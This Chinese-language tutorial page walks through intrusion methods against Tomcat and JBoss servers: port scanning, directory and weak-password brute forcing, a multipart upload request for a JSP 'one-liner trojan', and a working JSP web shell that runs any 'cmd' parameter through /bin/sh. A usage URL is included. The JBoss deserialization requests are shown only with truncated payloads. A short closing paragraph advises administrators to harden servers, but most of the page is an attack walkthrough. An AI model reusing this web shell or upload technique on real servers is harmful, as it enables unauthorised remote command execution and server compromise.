伪黑客的成功的秘密:tomcat入侵和Jboss入侵的方法介绍(图)

本文将介绍伪黑客常用的tomcat和Jboss入侵方法,帮助读者更好地了解网络安全和防范黑客攻击。以下是详细攻略:

伪黑客的成功的秘密:tomcat入侵和Jboss入侵的方法介绍(图)

本文将介绍伪黑客常用的tomcat和Jboss入侵方法,帮助读者更好地了解网络安全和防范黑客攻击。以下是详细攻略:

一、tomcat入侵

1.漏洞扫描

1.1 先扫描端口,确认tomcat是否开启。

1.2 对tomcat的目录进行爆破,找出存在漏洞的页面。

2.弱口令破解

尝试使用常见的弱口令字典,进行暴力破解。

3.文件上传漏洞

尝试上传jsp一句话木马,写入webshell。

示例1:使用工具hackbar模拟文件上传漏洞:

POST /examples/jsp/upload.jsp HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------1234567890
Content-Length: 395

-----------------------------1234567890
Content-Disposition: form-data; name="fileType"

1
-----------------------------1234567890
Content-Disposition: form-data; name="filename"

web3shell.jsp
-----------------------------1234567890
Content-Disposition: form-data; name="savePath"

/
-----------------------------1234567890
Content-Disposition: form-data; name="file"; filename="web3shell.jsp"
Content-Type: application/octet-stream

<% out.println("Hello World!");%>
-----------------------------1234567890--

4.命令执行漏洞

尝试利用命令执行漏洞,获取web服务器的shell权限。

示例2:使用命令执行漏洞获取web服务器shell权限:

http://localhost:8080/manager/html/upload?org.apache.catalina.filters.CSRF_NONCE=67145B74E8C299B7975268F4FA054C6C

在上传的jsp页面里加上一段代码:

<%
if(request.getParameter("cmd")!=null){
    try {
        String cmd = request.getParameter("cmd");
        String[] cmds = new String[] {"/bin/sh", "-c", cmd};
        Process p = Runtime.getRuntime().exec(cmds);
        BufferedReader br=new BufferedReader(new InputStreamReader(p.getInputStream()));
        String line;
        while((line=br.readLine())!=null){
            out.println(line+"<br>");
        }
        br.close();
    } catch (Exception e){
        e.printStackTrace();
    }
}
%>

然后就可以通过以下url执行系统命令:

http://localhost:8080/upload/shell.jsp?cmd=whoami

二、Jboss入侵

1.漏洞扫描

1.1 先扫描端口,确认jboss是否开启。

1.2 对jboss的目录进行爆破,找出存在漏洞的页面。

2.弱口令破解

尝试使用常见的弱口令字典,进行暴力破解。

3.反序列化漏洞

利用Jboss的反序列化漏洞,写入webshell获取shell权限。

示例3:使用序列化漏洞获取web服务器shell权限:

POST /invoker/JMSServlet HTTP/1.1
Host: localhost:8080
Content-Length: 535
Connection: close
Content-Type: application/x-java-serialized-object
class=org.jboss.invocation.MarshalledInvocation&object=
rO0ABXNyABpqYXZhLmxhbmcu...

在序列化的内容中添加一句话木马即可,如:

POST /invoker/JMSServlet HTTP/1.1
Host: localhost:8080
Content-Length: 431
Connection: close
Content-Type: application/x-java-serialized-object
class=org.jboss.invocation.MarshalledInvocation&object=...

结论

tomcat和Jboss作为常见的服务器程序,存在许多安全漏洞。黑客可以通过漏洞扫描、弱口令破解、文件上传漏洞、命令执行漏洞以及反序列化漏洞等方法攻击服务器,获取系统权限。建议系统管理员加强服务器安全配置,定期检查漏洞,提高系统安全性。

本文标题为:伪黑客的成功的秘密:tomcat入侵和Jboss入侵的方法介绍(图)

基础教程推荐